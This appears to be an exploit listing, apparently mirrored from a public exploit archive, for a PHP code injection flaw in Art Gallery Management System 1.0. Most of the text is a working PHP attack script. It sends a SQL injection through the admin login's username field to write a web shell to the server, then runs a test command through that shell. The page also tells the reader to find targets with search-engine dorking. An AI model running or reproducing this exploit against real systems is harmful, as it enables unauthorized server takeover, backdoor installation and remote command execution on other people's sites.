Art Gallery Management System 1.0 PHP Code Injection exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:181462 ============================================================================================================================================= | # Title : Art Gallery Management System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php [+] payload : <?php // المكتبات المطلوبة function send_request($url, $data) { $options = [ 'http' => [ 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } // تحديد URL ثابت $url = 'http://localhost/agms/'; // مسار ثابت لرفع الملف $path = 'C:\www\agms\uploaded.php'; $path = str_replace("\\", "\\\\", $path); // حمولة الباب الخلفي $backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'; // إرسال ملف PHP يحتوي على الباب الخلفي $payload = [ 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a", 'password' => 'test', 'login' => '' ]; send_request($url . "/admin/login.php", $payload); echo "[+] PHP backdoor uploaded successfully at $path\n"; // تنفيذ ملف PHP المرفوع واختبار الباب الخلفي $response = file_get_contents($url . "uploaded.php?cmd=whoami"); echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n"; ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================